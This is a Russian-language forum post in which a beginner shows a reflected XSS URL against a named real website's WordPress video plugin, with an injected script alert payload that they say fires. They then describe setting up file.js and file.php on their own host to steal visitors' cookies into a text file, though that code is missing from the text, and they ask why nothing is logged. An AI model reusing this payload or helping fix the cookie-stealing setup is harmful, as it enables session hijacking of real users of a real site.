Вообщем потихоньку начал вникать в ХСС и столкнулся с такой проблемой.

http://www.gamechangers.com/index.html/wp-content/plugins/simple-flash-video/stats/?action=regenerate&query=&date=201109%22%3E%3CSCRI PT%3Ealert%28/xss/.source%29%3C/SCRIPT%3E

Перейдя по ссылки видим всплывающий алерт с надписью ХСС.

Делаю вывод что ХСС активная уязвимость присутствует.

Далее заливаю к себе на хостинг следующие файлы:

file.js :

file.php :

И вставляю в уезвимое место следующий код:

В результате в файл куки.тхт ничего не записывается. Права на запись на хостинге поставил ..

Подскажите где ошибка ?